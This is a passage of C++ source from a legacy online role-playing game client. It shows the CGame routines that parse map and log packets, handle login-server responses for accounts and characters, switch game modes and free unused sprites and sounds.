			m_pEffectSpr[153]->PutTransSprite70(sX+20	, sY+110 , _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-20	, sY+16	, _tmp_iEffectFrame %15, dwTime);
			break;
	}	}
	if ( (m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top != -1) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top < msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom > msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left < msX) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right > msX) ) return TRUE;
	return FALSE;
}

void CGame::_ReadMapData(short sPivotX, short sPivotY, char * pData)
{int i;
 char  * cp, ucHeader, cDir, cName[12], cItemColor;
 short * sp, sTotal, sX, sY, sType, sAppr1, sAppr2, sAppr3, sAppr4, sItemSpr, sItemSprFrame, sDynamicObjectType;
 int iStatus, iStatus2;
 int   * ip, iApprColor;
 WORD    wObjectID;
 WORD  * wp, wDynamicObjectID;
	cp = pData;
	m_sVDL_X = sPivotX; // Valid Data Loc-X
	m_sVDL_Y = sPivotY;
	sp = (short *)cp;
	sTotal = *sp;
	cp += 2;
	for (i = 1;	i <= sTotal; i++)
	{	sp = (short *)cp;
		sX = *sp;
		cp += 2;
		sp = (short *)cp;
		sY = *sp;
		cp += 2;
		ucHeader = *cp;
		cp++;
		if (ucHeader & 0x01) // object ID
		{	wp  = (WORD *)cp;
			wObjectID = *wp;
			cp += 2;
			sp  = (short *)cp;
			sType = *sp;// object type
			cp += 2;
			// dir
			cDir = *cp;
			cp++;
			if (wObjectID < 10000)
			{	sp  = (short *)cp;
				sAppr1 = *sp;// Appearance1
				cp += 2;
				sp  = (short *)cp;
				sAppr2 = *sp;// Appearance2
				cp += 2;
				sp  = (short *)cp;
				sAppr3 = *sp;// Appearance3
				cp += 2;
				sp  = (short *)cp;
				sAppr4 = *sp;// Appearance4
				cp += 2;
				ip = (int *)cp;
				iApprColor = *ip;// v1.4 ApprColor
				cp += 4;
				// CLEROTH - CRASH BUG ( STATUS )
				// Status
				ip  = (int *)cp;
				iStatus = *ip;
				cp += 4;
				// Name
				ZeroMemory(cName, sizeof(cName));
				memcpy(cName, cp, 10);
				cp    += 10;
			}else // NPC
			{
				iStatus2 = 0;
				sAppr1 = sAppr3 = sAppr4 = 0;
				sp  = (short *)cp;
				sAppr2 = *sp;// Appearance2
				cp += 2;
				// CLEROTH - CRASH BUG ( STATUS )
				// Status
				ip  = (int *)cp;
				iStatus = *ip;
				cp += 4;
				// Name
				ZeroMemory(cName, sizeof(cName));
				memcpy(cName, cp, 5);
				cp    += 5;
			}
			m_pMapData->bSetOwner(wObjectID, sPivotX + sX, sPivotY + sY, sType, cDir, sAppr1, sAppr2, sAppr3, sAppr4, iApprColor, iStatus, cName, DEF_OBJECTSTOP, NULL, NULL, NULL);
		}
		if (ucHeader & 0x02) // object ID
		{	wp  = (WORD *)cp;
			wObjectID = *wp;
			cp += 2;
			sp  = (short *)cp;
			sType = *sp;	// object type
			cp += 2;
			cDir = *cp;	// dir
			cp++;
			if (wObjectID < 10000)
			{	sp  = (short *)cp;
				sAppr1 = *sp;// Appearance1
				cp += 2;
				sp  = (short *)cp;
				sAppr2 = *sp;// Appearance2
				cp += 2;
				sp  = (short *)cp;
				sAppr3 = *sp;// Appearance3
				cp += 2;
				sp  = (short *)cp;
				sAppr4 = *sp;// Appearance4
				cp += 2;
				ip = (int *)cp;
				iApprColor = *ip;// v1.4 ApprColor
				cp += 4;
				// CLEROTH - CRASH BUG ( STATUS )
				// Status
				ip  = (int *)cp;
				iStatus = *ip;
				cp += 4;
				// Name
				ZeroMemory(cName, sizeof(cName));
				memcpy(cName, cp, 10);
				cp    += 10;
			}else 	// NPC
			{	sAppr1 = sAppr3 = sAppr4 = 0;
				iStatus2 = 0;
				sp  = (short *)cp;
				sAppr2 = *sp;// Appearance2
				cp += 2;
				ip  = (int *)cp;
				iStatus = *ip;// Status
				cp += 4;
				ZeroMemory(cName, sizeof(cName));	// Name
				memcpy(cName, cp, 5);
				cp    += 5;
			}
			m_pMapData->bSetDeadOwner(wObjectID, sPivotX + sX, sPivotY + sY, sType, cDir, sAppr1, sAppr2, sAppr3, sAppr4, iApprColor, iStatus, cName);
		}
		if (ucHeader & 0x04)
		{	sp  = (short *)cp;
			sItemSpr = *sp;
			cp += 2;
			sp  = (short *)cp;
			sItemSprFrame = *sp;
			cp += 2;
			cItemColor = *cp;
			cp++;
			m_pMapData->bSetItem(sPivotX + sX, sPivotY + sY, sItemSpr, sItemSprFrame, cItemColor, FALSE);
		}
		if (ucHeader & 0x08) // Dynamic object
		{	wp = (WORD *)cp;
			wDynamicObjectID = *wp;
			cp += 2;
			sp  = (short *)cp;
			sDynamicObjectType = *sp;
			cp += 2;
			m_pMapData->bSetDynamicObject(sPivotX + sX, sPivotY + sY, wDynamicObjectID, sDynamicObjectType, FALSE);
	}	}
}

void CGame::LogEventHandler(char * pData)
{WORD * wp, wEventType, wObjectID;
 short * sp, sX, sY, sType, sAppr1, sAppr2, sAppr3, sAppr4;
 int iStatus, iStatus2;
 char  * cp, cDir, cName[12];
 int   * ip, iApprColor;
	wp   = (WORD *)(pData + DEF_INDEX2_MSGTYPE);
	wEventType = *wp;
	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
	wp  = (WORD *)cp;
	wObjectID  = *wp;
	cp += 2;
	sp  = (short *)cp;
	sX  = *sp;
	cp += 2;
	sp  = (short *)cp;
	sY  = *sp;
	cp += 2;
	sp  = (short *)cp;
	sType = *sp;
	cp += 2;
	cDir = *cp;
	cp++;
	ZeroMemory(cName, sizeof(cName));
	if (wObjectID < 10000)
	{	memcpy(cName, cp, 10);
		cp += 10;
		sp  = (short *)cp;
		sAppr1 = *sp;
		cp += 2;
		sp  = (short *)cp;
		sAppr2 = *sp;
		cp += 2;
		sp  = (short *)cp;
		sAppr3 = *sp;
		cp += 2;
		sp  = (short *)cp;
		sAppr4 = *sp;
		cp += 2;
		ip = (int *)cp;
		iApprColor = *ip;
		cp += 4;
		// CLEROTH - CRASH BUG ( STATUS )
		ip  = (int *)cp;
		iStatus = *ip;
		cp += 4;
	}else 	// NPC
	{	memcpy(cName, cp, 5);
		cp += 5;
		sAppr1 = sAppr3 = sAppr4 = 0;
		sp  = (short *)cp;
		sAppr2 = *sp;
		cp += 2;
		ip  = (int *)cp;
		iStatus = *ip;
		cp += 4;
	}

	switch (wEventType) {
	case DEF_MSGTYPE_CONFIRM:
		m_pMapData->bSetOwner(wObjectID, sX, sY, sType, cDir, sAppr1, sAppr2, sAppr3, sAppr4, iApprColor, iStatus, cName, DEF_OBJECTSTOP, NULL, NULL, NULL);
		switch (sType) {
		case 43: // LWB
		case 44: // GHK
		case 45: // GHKABS
		case 46: // TK
		case 47: // BG
			bAddNewEffect(64, (sX)*32 ,(sY)*32, NULL, NULL, 0);
			break;
		}
		break;

	case DEF_MSGTYPE_REJECT:
		m_pMapData->bSetOwner(wObjectID, -1, -1, sType, cDir, sAppr1, sAppr2, sAppr3, sAppr4, iApprColor, iStatus, cName, DEF_OBJECTSTOP, NULL, NULL, NULL);
		break;
	}

	_RemoveChatMsgListByObjectID(wObjectID);
}

void CGame::OnLogSocketEvent(WPARAM wParam, LPARAM lParam)
{int iRet;
 char * pData;
 DWORD  dwMsgSize;
	if (m_pLSock == NULL) return;

	iRet = m_pLSock->iOnSocketEvent(wParam, lParam);
	switch (iRet) {
	case DEF_XSOCKEVENT_CONNECTIONESTABLISH:
		ConnectionEstablishHandler(DEF_SERVERTYPE_LOG);
		break;

	case DEF_XSOCKEVENT_READCOMPLETE:
		pData = m_pLSock->pGetRcvDataPointer(&dwMsgSize);
		LogResponseHandler(pData);
		m_dwTime = G_dwGlobalTime;
		break;

	case DEF_XSOCKEVENT_SOCKETCLOSED:
	case DEF_XSOCKEVENT_SOCKETERROR:
	case DEF_XSOCKEVENT_CRITICALERROR:
		ChangeGameMode(DEF_GAMEMODE_ONCONNECTIONLOST);
		delete m_pLSock;
		m_pLSock = NULL;
		break;
	}
}

void CGame::LogResponseHandler(char * pData)
{
 WORD  * wp, wResponse;
 WORD wServerUpperVersion, wServerLowerVersion;
 DWORD * dwp;
 char  * cp, cCharName[12];
 int   * ip, i;

	dwp = (DWORD *)(pData);
	wp = (WORD *)(pData + DEF_INDEX2_MSGTYPE);
	wResponse = *wp;
	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);

	switch (wResponse) {
	case DEF_LOGRESMSGTYPE_CHARACTERDELETED:
		cp = (pData + DEF_INDEX2_MSGTYPE + 2);
		cp++;
		m_iTotalChar = (int)*cp;
		cp++;
		for (i = 0; i < 4; i++)
		if (m_pCharList[i] != NULL)
		{	delete m_pCharList[i];
			m_pCharList[i] = NULL;
		}

		for (i = 0; i < m_iTotalChar; i++) {
			m_pCharList[i] = new class CCharInfo;
			memcpy(m_pCharList[i]->m_cName, cp, 10);
			cp += 10;
			if (*cp == 0)
			{	m_pCharList[i]->m_sSex = NULL; // Sex
				cp += 40;
			}else
			{	cp++;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sAppr1 = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sAppr2 = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sAppr3 = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sAppr4 = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sSex = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sSkinCol = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sLevel = *wp;
				cp += 2;
				dwp = (DWORD *)cp;
				m_pCharList[i]->m_iExp = *dwp;
				cp += 4;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sStr = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sVit = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sDex = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sInt = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sMag = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sChr = *wp;
				cp += 2;
				ip = (int *)cp; // v1.4
				m_pCharList[i]->m_iApprColor = *ip;
				cp += 4;
				wp = (WORD *)cp;
				m_pCharList[i]->m_iYear = (int)*wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_iMonth = (int)*wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_iDay = (int)*wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_iHour = (int)*wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_iMinute = (int)*wp;
				cp += 2;
				ZeroMemory(m_pCharList[i]->m_cMapName, sizeof(m_pCharList[i]->m_cMapName));
				memcpy(m_pCharList[i]->m_cMapName, cp, 10);
				cp += 10;
		}	}
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "3A");
		break;

	case DEF_LOGRESMSGTYPE_CONFIRM:
		cp = (pData + DEF_INDEX2_MSGTYPE + 2);
		wp = (WORD *)cp;
		wServerUpperVersion = *wp;
		cp += 2;
		wp = (WORD *)cp;
		wServerLowerVersion = *wp;
		cp += 2;
		cp++;
		wp = (WORD *)cp;
		m_iAccntYear = *wp;
		cp += 2;
		wp = (WORD *)cp;
		m_iAccntMonth = *wp;
		cp += 2;
		wp = (WORD *)cp;
		m_iAccntDay = *wp;
		cp += 2;
		wp = (WORD *)cp;
		m_iIpYear = *wp;
		cp += 2;
		wp = (WORD *)cp;
		m_iIpMonth = *wp;
		cp += 2;
		wp = (WORD *)cp;
		m_iIpDay = *wp;
		cp += 2;
		m_iTotalChar = (int)*cp;
		cp++;
		for (i = 0; i < 4; i++)
		if (m_pCharList[i] != NULL)
		{	delete m_pCharList[i];
			m_pCharList[i] = NULL;
		}

		for (i = 0; i < m_iTotalChar; i++)
		{	m_pCharList[i] = new class CCharInfo;
			memcpy(m_pCharList[i]->m_cName, cp, 10);
			cp += 10;
			if (*cp == 0)
			{	m_pCharList[i]->m_sSex = NULL;
				cp += 40;
			}else
			{	cp++;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sAppr1 = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sAppr2 = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sAppr3 = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sAppr4 = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sSex = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sSkinCol = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sLevel = *wp;
				cp += 2;
				dwp = (DWORD *)cp;
				m_pCharList[i]->m_iExp = *dwp;
				cp += 4;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sStr = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sVit = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sDex = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sInt = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sMag = *wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_sChr = *wp;
				cp += 2;
				ip = (int *)cp;
				m_pCharList[i]->m_iApprColor = *ip; // v1.4
				cp += 4;
				wp = (WORD *)cp;
				m_pCharList[i]->m_iYear = (int)*wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_iMonth = (int)*wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_iDay = (int)*wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_iHour = (int)*wp;
				cp += 2;
				wp = (WORD *)cp;
				m_pCharList[i]->m_iMinute = (int)*wp;
				cp += 2;
				ZeroMemory(m_pCharList[i]->m_cMapName, sizeof(m_pCharList[i]->m_cMapName));
				memcpy(m_pCharList[i]->m_cMapName, cp, 10);
				cp += 10;
		}	}
		ip = (int *)cp;
		m_iTimeLeftSecAccount = *ip;
		cp += 4;
		ip = (int *)cp;
		m_iTimeLeftSecIP = *ip;
		cp += 4;
		ChangeGameMode(DEF_GAMEMODE_ONSELECTCHARACTER);
		ClearContents_OnSelectCharacter();

		if ( (wServerUpperVersion!=DEF_UPPERVERSION) || (wServerLowerVersion!=DEF_LOWERVERSION) )
			ChangeGameMode(DEF_GAMEMODE_ONVERSIONNOTMATCH);

		break;

	case DEF_LOGRESMSGTYPE_REJECT:
		cp = (pData + DEF_INDEX2_MSGTYPE + 2);
		ip = (int *)cp;
		m_iBlockYear = *ip;
		cp += 4;

		ip = (int *)cp;
		m_iBlockMonth = *ip;
		cp += 4;

		ip = (int *)cp;
		m_iBlockDay = *ip;
		cp += 4;

		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "7H");
		break;

	case DEF_LOGRESMSGTYPE_NOTENOUGHPOINT:
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "7I");
		break;

	case DEF_LOGRESMSGTYPE_ACCOUNTLOCKED:
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "7K");
		break;

	case DEF_LOGRESMSGTYPE_SERVICENOTAVAILABLE:
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "7L");
		break;

	case DEF_LOGRESMSGTYPE_PASSWORDCHANGESUCCESS:
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "6B");
		break;

	case DEF_LOGRESMSGTYPE_PASSWORDCHANGEFAIL:
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "6C");
		break;

	case DEF_LOGRESMSGTYPE_PASSWORDMISMATCH:
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "11");
		break;

	case DEF_LOGRESMSGTYPE_NOTEXISTINGACCOUNT:
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "12");
		break;

	case DEF_LOGRESMSGTYPE_NEWACCOUNTCREATED:
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "54");
		break;

	case DEF_LOGRESMSGTYPE_NEWACCOUNTFAILED:
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "05");
		break;

	case DEF_LOGRESMSGTYPE_ALREADYEXISTINGACCOUNT:
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "06");
		break;

	case DEF_LOGRESMSGTYPE_NOTEXISTINGCHARACTER:
		ChangeGameMode(DEF_GAMEMODE_ONMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "Not existing character!");
		break;

	case DEF_LOGRESMSGTYPE_NEWCHARACTERCREATED:
		ZeroMemory(cCharName, sizeof(cCharName));
		memcpy(cCharName, cp, 10);
		cp += 10;

		m_iTotalChar = (int)*cp;
		cp++;

		for (i = 0; i < 4; i++)
		if (m_pCharList[i] != NULL) delete m_pCharList[i];
		//
		for (i = 0; i < m_iTotalChar; i++) {
			m_pCharList[i] = new class CCharInfo;
			memcpy(m_pCharList[i]->m_cName, cp, 10);
			cp += 10;
			if (*cp == 0) {
				m_pCharList[i]->m_sSex = NULL; // Sex
				cp += 40;
			}
			else {
				cp++;

				wp = (WORD *)cp;
				m_pCharList[i]->m_sAppr1 = *wp;
				cp += 2;

				wp = (WORD *)cp;
				m_pCharList[i]->m_sAppr2 = *wp;
				cp += 2;

				wp = (WORD *)cp;
				m_pCharList[i]->m_sAppr3 = *wp;
				cp += 2;

				wp = (WORD *)cp;
				m_pCharList[i]->m_sAppr4 = *wp;
				cp += 2;

				wp = (WORD *)cp;
				m_pCharList[i]->m_sSex = *wp;
				cp += 2;

				wp = (WORD *)cp;
				m_pCharList[i]->m_sSkinCol = *wp;
				cp += 2;

				wp = (WORD *)cp;
				m_pCharList[i]->m_sLevel = *wp;
				cp += 2;

				dwp = (DWORD *)cp;
				m_pCharList[i]->m_iExp = *dwp;
				cp += 4;

				wp = (WORD *)cp;
				m_pCharList[i]->m_sStr = *wp;
				cp += 2;

				wp = (WORD *)cp;
				m_pCharList[i]->m_sVit = *wp;
				cp += 2;

				wp = (WORD *)cp;
				m_pCharList[i]->m_sDex = *wp;
				cp += 2;

				wp = (WORD *)cp;
				m_pCharList[i]->m_sInt = *wp;
				cp += 2;

				wp = (WORD *)cp;
				m_pCharList[i]->m_sMag = *wp;
				cp += 2;

				wp = (WORD *)cp;
				m_pCharList[i]->m_sChr = *wp;
				cp += 2;

				ip = (int *)cp; // v1.4
				m_pCharList[i]->m_iApprColor = *ip;
				cp += 4;

				wp = (WORD *)cp;
				m_pCharList[i]->m_iYear = (int)*wp;
				cp += 2;

				wp = (WORD *)cp;
				m_pCharList[i]->m_iMonth = (int)*wp;
				cp += 2;

				wp = (WORD *)cp;
				m_pCharList[i]->m_iDay = (int)*wp;
				cp += 2;

				wp = (WORD *)cp;
				m_pCharList[i]->m_iHour = (int)*wp;
				cp += 2;

				wp = (WORD *)cp;
				m_pCharList[i]->m_iMinute = (int)*wp;
				cp += 2;

				ZeroMemory(m_pCharList[i]->m_cMapName, sizeof(m_pCharList[i]->m_cMapName));
				memcpy(m_pCharList[i]->m_cMapName, cp, 10);
				cp += 10;
			}
		}
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "47");
		break;

	case DEF_LOGRESMSGTYPE_NEWCHARACTERFAILED:
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "28");
		break;

	case DEF_LOGRESMSGTYPE_ALREADYEXISTINGCHARACTER:
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "29");
		break;

	case DEF_ENTERGAMERESTYPE_PLAYING:
		ChangeGameMode(DEF_GAMEMODE_ONQUERYFORCELOGIN);
		break;

	case DEF_ENTERGAMERESTYPE_CONFIRM:
		{	int iGameServerPort;
			char cGameServerAddr[16];
			ZeroMemory(cGameServerAddr, sizeof(cGameServerAddr));
			cp = (pData + DEF_INDEX2_MSGTYPE + 2);
			memcpy(cGameServerAddr, cp, 16);
			cp += 16;
			wp = (WORD *)cp;
			iGameServerPort = *wp;
			cp += 2;
			ZeroMemory(m_cGameServerName, sizeof(m_cGameServerName));
			memcpy(m_cGameServerName, cp, 20);
			cp += 20;
			m_pGSock = new class XSocket(m_hWnd, DEF_SOCKETBLOCKLIMIT);
			m_pGSock->bConnect(m_cLogServerAddr, iGameServerPort, WM_USER_GAMESOCKETEVENT);
			m_pGSock->bInitBufferSize(30000);
		}
		break;

	case DEF_ENTERGAMERESTYPE_REJECT:
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
		switch (*cp) {
		case 1:	strcpy(m_cMsg, "3E"); break;
		case 2:	strcpy(m_cMsg, "3F"); break;
		case 3:	strcpy(m_cMsg, "33"); break;
		case 4: strcpy(m_cMsg, "3D"); break;
		case 5: strcpy(m_cMsg, "3G"); break;
		case 6: strcpy(m_cMsg, "3Z"); break;
		case 7: strcpy(m_cMsg, "3J"); break;
		}
		break;

	case DEF_ENTERGAMERESTYPE_FORCEDISCONN:
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "3X");
		break;

	case DEF_LOGRESMSGTYPE_NOTEXISTINGWORLDSERVER:
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "1Y");
		break;

	case DEF_LOGRESMSGTYPE_INPUTKEYCODE:
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
		switch (*cp) {
		case 1:	strcpy(m_cMsg, "8U"); break; //MainMenu, Keycode registration success
		case 2:	strcpy(m_cMsg, "82"); break; //MainMenu, Not existing Account
		case 3:	strcpy(m_cMsg, "81"); break; //MainMenu, Password wrong
		case 4: strcpy(m_cMsg, "8V"); break; //MainMenu, Invalid Keycode
		case 5: strcpy(m_cMsg, "8W"); break; //MainMenu, Already Used Keycode
		}
		break;


	case DEF_LOGRESMSGTYPE_FORCECHANGEPASSWORD:
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "6M");
		break;

	case DEF_LOGRESMSGTYPE_INVALIDKOREANSSN:
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "1a");
		break;

	case DEF_LOGRESMSGTYPE_LESSTHENFIFTEEN:
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "1b");
		break;

	}
	delete m_pLSock;
	m_pLSock = NULL;
}

void CGame::UpdateScreen_OnMsg()
{short msX, msY, msZ;
 char cLB, cRB;
 DWORD dwTime = G_dwGlobalTime;
	m_DDraw.ClearBackB4();
	PutString(10, 10, m_cMsg, RGB(255,155,155), FALSE, 1);
	DrawVersion();
	m_DInput.UpdateMouseState(&msX, &msY, &msZ, &cLB, &cRB);
	m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(msX, msY, 0, dwTime);
	if (m_DDraw.iFlip() == DDERR_SURFACELOST) RestoreSprites();
	if ((G_dwGlobalTime - m_dwTime) > 1500)
	{	ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
	}
}

void CGame::_InitOnCreateNewCharacter()
{	m_cGender    = rand() % 2 + 1;
	m_cSkinCol   = rand() % 3 + 1;
	m_cHairStyle = rand() % 8;
	m_cHairCol   = rand() % 16;
	m_cUnderCol  = rand() % 8;
	m_ccStr = 10;
	m_ccVit = 10;
	m_ccDex = 10;
	m_ccInt = 10;
	m_ccMag = 10;
	m_ccChr = 10;
}

void CGame::ClearContents_OnCreateNewAccount()
{
	ZeroMemory(m_cAccountPassword, sizeof(m_cAccountPassword));
	ZeroMemory(m_cAccountAge, sizeof(m_cAccountAge));
	ZeroMemory(m_cAccountCountry, sizeof(m_cAccountCountry));
	ZeroMemory(m_cAccountSSN, sizeof(m_cAccountSSN));
	ZeroMemory(m_cEmailAddr, sizeof(m_cEmailAddr));
	//v1.4334
	ZeroMemory(m_cAccountQuiz, sizeof(m_cAccountQuiz));
	ZeroMemory(m_cAccountAnswer, sizeof(m_cAccountAnswer));
}

void CGame::ChangeGameMode(char cMode)
{
	m_cGameMode = cMode;
	m_cGameModeCount = 0;
	m_dwTime = G_dwGlobalTime;

	if( cMode == DEF_GAMEMODE_ONSELECTSERVER )
	{	ZeroMemory(m_cWorldServerName, sizeof(m_cWorldServerName));
		strcpy(m_cWorldServerName, NAME_WORLDNAME);
		m_cGameMode = DEF_GAMEMODE_ONLOGIN;
	}
}

void CGame::bReadIp()
{	
	ZeroMemory(m_cLogServerAddr, sizeof(m_cLogServerAddr));
    strcpy(m_cLogServerAddrBuffer, DEF_SERVER_DNS);
	m_iLogServerPort = DEF_SERVER_PORT;
}

void CGame::ReleaseUnusedSprites()
{	int i;
	for (i = 0; i < DEF_MAXSPRITES; i++)
	if ((m_pSprite[i] != NULL))
	{	if( (m_pSprite[i]->m_bIsSurfaceEmpty == FALSE) && (m_pSprite[i]->m_bOnCriticalSection == FALSE) )
		{	if ((G_dwGlobalTime - m_pSprite[i]->m_dwRefTime) > 60000 ) m_pSprite[i]->_iCloseSprite();

	}	}
	for (i = 0; i < DEF_MAXTILES; i++)
	if ((m_pTileSpr[i] != NULL))
	{	if( (m_pTileSpr[i]->m_bIsSurfaceEmpty == FALSE) && (m_pTileSpr[i]->m_bOnCriticalSection == FALSE) )
		{	if ((G_dwGlobalTime - m_pTileSpr[i]->m_dwRefTime) > 60000 ) m_pTileSpr[i]->_iCloseSprite();
	}	}
	for (i = 0; i < DEF_MAXEFFECTSPR; i++)
	if ((m_pEffectSpr[i] != NULL))
	{	if( (m_pEffectSpr[i]->m_bIsSurfaceEmpty == FALSE) && (m_pEffectSpr[i]->m_bOnCriticalSection == FALSE) )
		{	if ((G_dwGlobalTime - m_pEffectSpr[i]->m_dwRefTime) > 60000 ) m_pEffectSpr[i]->_iCloseSprite();
	}	}

	for (i = 0; i < DEF_MAXSOUNDEFFECTS; i++)
	{	if (m_pCSound[i] != NULL)
		{	if (((G_dwGlobalTime - m_pCSound[i]->m_dwTime) > 30000) && (m_pCSound[i]->m_bIsLooping == FALSE)) m_pCSound[i]->_ReleaseSoundBuffer();
		}
		if (m_pMSound[i] != NULL)
		{	if (((G_dwGlobalTime - m_pMSound[i]->m_dwTime) > 30000) && (m_pMSound[i]->m_bIsLooping == FALSE)) m_pMSound[i]->_ReleaseSoundBuffer();
		}
		if (m_pESound[i] != NULL)
		{	if (((G_dwGlobalTime - m_pESound[i]->m_dwTime) > 30000) && (m_pESound[i]->m_bIsLooping == FALSE)) m_pESound[i]->_ReleaseSoundBuffer();
	}	}
}

void CGame::PutChatScrollList(char * pMsg, char cType)
{int i;
	if (m_pChatScrollList[DEF_MAXCHATSCROLLMSGS - 1] != NULL)
	{	delete m_pChatScrollList[DEF_MAXCHATSCROLLMSGS - 1];
		m_pChatScrollList[DEF_MAXCHATSCROLLMSGS - 1] = NULL;
	}
	for (i = DEF_MAXCHATSCROLLMSGS - 2; i >= 0; i--)
	{	m_pChatScrollList[i+1] = m_pChatScrollList[i];
		m_pChatScrollList[i] = NULL;
	}
	m_pChatScrollList[0] = new class CMsg(1, pMsg, cType);
}

void CGame::ChatMsgHandler(char * pData)
{
 int i, iObjectID, iLoc;
 short * sp, sX, sY;
 char * cp, cMsgType, cName[21], cTemp[100], cMsg[100], cTxt1[100], cTxt2[100];
 DWORD dwTime;
